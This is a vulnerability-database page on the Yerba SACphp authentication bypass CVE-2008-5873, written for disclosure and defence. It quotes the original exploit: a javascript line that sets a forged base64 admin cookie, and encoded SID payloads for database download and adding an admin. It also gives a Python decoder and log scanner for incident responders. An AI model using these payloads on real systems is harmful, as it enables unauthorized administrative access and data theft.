Yerba SACphp Multiple Remote Security Vulnerabilities

Vulnerability ID: 1184144    Vulnerability type: Permissions, privileges and access control
Published: 2009-01-08    Updated: 2009-01-29
CVE ID: CVE-2008-5873    CNNVD ID: CNNVD-200901-078
Platform: N/A    CVSS score: 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2009010138
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-078
|Vulnerability details
Yerba SACphp 6.3 and earlier allow a remote attacker to bypass authentication and obtain administrative access by supplying a crafted galleta[sesion] cookie. The cookie value is plain base64; its decoded form is a colon-separated record that begins with 1:1: (the value used in the published exploit decodes to 1:1:Administrador del Sistema:'). Because the application accepts this unsigned, client-supplied cookie as proof of identity, no valid credentials are needed.
|Exploit
 [*]~======================================================~[*] 
 [*]   Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities  [*]
 [*]~======================================================~[*]
 
 [?] Discovered By StAkeR - StAkeR[at]hotmail[dot]it
 [?] Discovered On 07/10/2008
 [?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0

 [?] Admin Login ByPass
 [?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="

 [?] Privilege Escalation 
 [?] index.php?SID=[path (base64 encoded)]

 [?] Arbitrary Database Download
 [?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==

 [?] Arbitrary Add Admin 
 [?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==
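What the published payloads actually carry, as an added example written for this page (Python; it is not part of StAkeR's exploit or of SACphp itself): it decodes the galleta[sesion] cookie and the two SID values shown above, and runs the same decoder over constructed access-log lines so a responder can see which module and function each request asked for. The SID scheme (base64 of the query string written backwards) is inferred from decoding the two payloads on this page; what SACphp does with the mod, mop and fx parameters server-side is not described here and is an assumption, and the log lines are constructed, not captured from a real server.

```python
import base64
import re
from urllib.parse import parse_qsl, unquote

# Payloads copied verbatim from the StAkeR advisory above.
COOKIE_BYPASS = "MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="
SID_DB_DOWNLOAD = "Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ=="
SID_ADD_ADMIN = "JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ=="


def decode_cookie(value: str) -> str:
    """Plaintext behind a galleta[sesion] cookie value (it is plain base64)."""
    return base64.b64decode(value).decode("utf-8")


def is_forged_admin_cookie(value: str) -> bool:
    """The advisory's bypass condition: the decoded cookie begins with '1:1:'.
    Anything that is not valid base64/UTF-8 is simply not a match."""
    try:
        return decode_cookie(value).startswith("1:1:")
    except (ValueError, UnicodeDecodeError):
        return False


def decode_sid(sid: str) -> str:
    """Decode an index.php?SID= value.

    Decoding the two published SID payloads shows the scheme is
    base64(reverse(query_string)). The reversal is inferred from those
    payloads; the advisory does not document it (assumption)."""
    return base64.b64decode(sid).decode("utf-8")[::-1]


def encode_sid(query_string: str) -> str:
    """Inverse of decode_sid, so the published payloads round-trip exactly."""
    return base64.b64encode(query_string[::-1].encode("utf-8")).decode("ascii")


def sid_params(sid: str) -> dict:
    """Parse the hidden query string into a dict (the trailing '&' adds nothing)."""
    return dict(parse_qsl(decode_sid(sid)))


# Matches the SID value in a logged request line; stops at space, '&' or quote.
SID_RE = re.compile(r'[?&]SID=([^ &"]+)')

# Constructed sample log lines in Apache combined-log style (not real traffic).
# Line 2 carries the DB-download SID with its '=' padding percent-encoded,
# line 3 the add-admin SID as-is.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Jan/2009:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [08/Jan/2009:10:00:07 +0000] "GET /index.php?SID='
    'Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ%3D%3D HTTP/1.1" 200 90112',
    '10.0.0.9 - - [08/Jan/2009:10:00:09 +0000] "GET /index.php?SID='
    'JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ== HTTP/1.1" 200 1440',
]


def decoded_sids(log_lines):
    """For every line carrying SID=, return (line_no, decoded query string, params).

    Lines whose SID does not decode are still reported, with None/{}; an
    analyst reads the decoded mod/mop/fx values to judge intent, since which
    combinations are legitimate depends on the deployment, not on the advisory."""
    out = []
    for lineno, line in enumerate(log_lines, 1):
        m = SID_RE.search(line)
        if not m:
            continue
        raw = unquote(m.group(1))  # undo %3D etc. before base64-decoding
        try:
            qs = decode_sid(raw)
        except (ValueError, UnicodeDecodeError):
            qs = None
        out.append((lineno, qs, dict(parse_qsl(qs)) if qs else {}))
    return out


if __name__ == "__main__":
    print("cookie decodes to:", decode_cookie(COOKIE_BYPASS))
    for name, sid in (("db download", SID_DB_DOWNLOAD), ("add admin", SID_ADD_ADMIN)):
        print(f"{name}: {decode_sid(sid)}  -> {sid_params(sid)}")
    for lineno, qs, params in decoded_sids(SAMPLE_LOG):
        print(f"log line {lineno}: {qs} {params}")
```

Both SID payloads decode to a query string naming a module (mod=yDBAdmin, mod=yUsuarios), an operation (mop=sistema) and a function (fx=respaldo, fx=agregar), which is why the advisory can list a database download and an admin-creation primitive from a single parameter: the routing decision is carried in an attacker-controlled, unsigned string. Treating the decoded form, not the opaque SID, as the thing to log and review is the practical takeaway.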

|References

Source: XF
Name: yerbasacphp-galletasesion-security-bypass(45734)
Link: http://xforce.iss.net/xforce/xfdb/45734
Source: BID
Name: 31619
Link: http://www.securityfocus.com/bid/31619
Source: MILW0RM
Name: 6691
Link: http://www.milw0rm.com/exploits/6691
Source: SREASON
Name: 4883
Link: http://securityreason.com/securityalert/4883
Source: SECUNIA
Name: 32093
Link: http://secunia.com/advisories/32093